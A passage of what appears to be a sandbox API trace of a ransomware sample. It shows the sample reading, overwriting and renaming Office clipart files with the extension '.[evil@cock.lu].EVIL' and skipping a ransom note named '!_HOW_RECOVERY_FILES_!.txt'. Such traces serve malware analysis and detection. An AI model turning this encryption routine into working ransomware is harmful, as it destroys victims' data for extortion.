0x84b1160840 [0169.715] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.715] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1860, lpOverlapped=0x0) returned 1 [0169.715] CloseHandle (hObject=0x1a8) returned 1 [0169.715] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.715] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.716] __uncaught_exception () returned 0x84b1160800 [0169.716] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.716] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00736_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00736_.wmf.[evil@cock.lu].evil")) returned 1 [0169.717] ??_V@YAXPEAX@Z () returned 0x1 [0169.721] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF", dwFileAttributes=0x200) returned 0 [0169.721] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.721] wcsstr (_Str="SO00768_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.721] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF") returned 69 [0169.721] wcscmp (_String1="SO00768_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.721] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00768_.WMF") returned 0x0 [0169.721] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF") returned 0x45 [0169.721] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00768_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.724] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x543a, lpOverlapped=0x0) returned 1 [0169.734] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.734] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.734] _errno () returned 0x84b1160840 [0169.734] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.734] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x5440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5440, lpOverlapped=0x0) returned 1 [0169.734] CloseHandle (hObject=0x1a8) returned 1 [0169.734] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.734] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.734] __uncaught_exception () returned 0x84b1160800 [0169.735] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.735] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00768_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00768_.wmf.[evil@cock.lu].evil")) returned 1 [0169.736] ??_V@YAXPEAX@Z () returned 0x1 [0169.740] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF", dwFileAttributes=0x200) returned 0 [0169.740] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.740] wcsstr (_Str="SO00783_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.740] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF") returned 69 [0169.740] wcscmp (_String1="SO00783_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.740] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00783_.WMF") returned 0x0 [0169.740] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF") returned 0x45 [0169.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00783_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.743] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16ee, lpOverlapped=0x0) returned 1 [0169.759] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.759] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.759] _errno () returned 0x84b1160840 [0169.759] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.759] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1700, lpOverlapped=0x0) returned 1 [0169.759] CloseHandle (hObject=0x1a8) returned 1 [0169.760] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.760] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.760] __uncaught_exception () returned 0x84b1160800 [0169.760] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.760] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00783_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00783_.wmf.[evil@cock.lu].evil")) returned 1 [0169.762] ??_V@YAXPEAX@Z () returned 0x1 [0169.765] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF", dwFileAttributes=0x200) returned 0 [0169.766] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.766] wcsstr (_Str="SO00820_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.766] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF") returned 69 [0169.766] wcscmp (_String1="SO00820_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.766] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00820_.WMF") returned 0x0 [0169.766] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF") returned 0x45 [0169.766] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00820_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.769] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x41c2, lpOverlapped=0x0) returned 1 [0169.792] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.792] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.792] _errno () returned 0x84b1160840 [0169.792] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.792] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x41e0, lpOverlapped=0x0) returned 1 [0169.792] CloseHandle (hObject=0x1a8) returned 1 [0169.792] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.793] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.793] __uncaught_exception () returned 0x84b1160800 [0169.793] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.793] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00820_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00820_.wmf.[evil@cock.lu].evil")) returned 1 [0169.794] ??_V@YAXPEAX@Z () returned 0x1 [0169.798] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF", dwFileAttributes=0x200) returned 0 [0169.798] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.798] wcsstr (_Str="SO00828_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.798] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF") returned 69 [0169.798] wcscmp (_String1="SO00828_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.799] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00828_.WMF") returned 0x0 [0169.799] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF") returned 0x45 [0169.799] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.801] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x28ae, lpOverlapped=0x0) returned 1 [0169.811] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.811] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.811] _errno () returned 0x84b1160840 [0169.811] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.811] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x28c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x28c0, lpOverlapped=0x0) returned 1 [0169.811] CloseHandle (hObject=0x1a8) returned 1 [0169.811] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.811] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.812] __uncaught_exception () returned 0x84b1160800 [0169.812] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.812] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00828_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00828_.wmf.[evil@cock.lu].evil")) returned 1 [0169.813] ??_V@YAXPEAX@Z () returned 0x1 [0169.817] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF", dwFileAttributes=0x200) returned 0 [0169.817] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.817] wcsstr (_Str="SO00834_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.817] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF") returned 69 [0169.817] wcscmp (_String1="SO00834_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.817] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00834_.WMF") returned 0x0 [0169.817] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF") returned 0x45 [0169.817] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00834_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.820] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x36da, lpOverlapped=0x0) returned 1 [0169.829] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.829] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.829] _errno () returned 0x84b1160840 [0169.829] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.829] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x36e0, lpOverlapped=0x0) returned 1 [0169.830] CloseHandle (hObject=0x1a8) returned 1 [0169.830] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.830] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.830] __uncaught_exception () returned 0x84b1160800 [0169.830] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.830] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00834_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00834_.wmf.[evil@cock.lu].evil")) returned 1 [0169.831] ??_V@YAXPEAX@Z () returned 0x1 [0169.834] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF", dwFileAttributes=0x200) returned 0 [0169.835] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.835] wcsstr (_Str="SO00837_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.835] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF") returned 69 [0169.835] wcscmp (_String1="SO00837_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.835] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00837_.WMF") returned 0x0 [0169.835] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF") returned 0x45 [0169.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00837_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.838] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3fe8, lpOverlapped=0x0) returned 1 [0169.847] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.847] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.847] _errno () returned 0x84b1160840 [0169.847] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.848] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4000, lpOverlapped=0x0) returned 1 [0169.848] CloseHandle (hObject=0x1a8) returned 1 [0169.848] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.848] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.848] __uncaught_exception () returned 0x84b1160800 [0169.848] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.848] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00837_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00837_.wmf.[evil@cock.lu].evil")) returned 1 [0169.849] ??_V@YAXPEAX@Z () returned 0x1 [0169.852] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF", dwFileAttributes=0x200) returned 0 [0169.852] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.852] wcsstr (_Str="SO00910_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.852] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF") returned 69 [0169.852] wcscmp (_String1="SO00910_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.852] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00910_.WMF") returned 0x0 [0169.852] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF") returned 0x45 [0169.852] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00910_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.854] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1898, lpOverlapped=0x0) returned 1 [0169.862] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.862] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.862] _errno () returned 0x84b1160840 [0169.862] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.862] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x18a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x18a0, lpOverlapped=0x0) returned 1 [0169.862] CloseHandle (hObject=0x1a8) returned 1 [0169.862] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.862] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.862] __uncaught_exception () returned 0x84b1160800 [0169.863] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.863] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00910_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00910_.wmf.[evil@cock.lu].evil")) returned 1 [0169.864] ??_V@YAXPEAX@Z () returned 0x1 [0169.866] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF", dwFileAttributes=0x200) returned 0 [0169.866] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.867] wcsstr (_Str="SO00911_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.867] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF") returned 69 [0169.867] wcscmp (_String1="SO00911_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.867] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00911_.WMF") returned 0x0 [0169.867] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF") returned 0x45 [0169.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00911_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.869] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x29f8, lpOverlapped=0x0) returned 1 [0169.876] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.876] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.876] _errno () returned 0x84b1160840 [0169.876] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.876] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a00, lpOverlapped=0x0) returned 1 